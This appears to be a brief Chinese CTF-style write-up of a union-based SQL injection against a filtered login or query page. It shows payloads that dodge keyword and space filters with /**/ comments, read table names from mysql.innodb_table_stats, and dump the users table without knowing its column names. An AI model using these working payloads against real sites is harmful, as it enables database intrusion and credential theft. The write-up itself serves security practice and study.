打开 注册登录
申请发布广告
存在过滤 ---and,order by…空格,#,information_schema.tables也被过滤了
当order by被过滤可以试试group by
空格通过/**/ 绕过 #由’闭合绕过
判断出有22列
-1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
查看回显 是2,3
-1'union/**/select/**/1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
爆库名 web1
可利用
①mysql.innodb_table_stats
②sys.schema_auto_increment_columns 进行绕过
1'/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'
但无法报列名 于是采用无列名爆值
-1'union/**/select/**/1, (select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22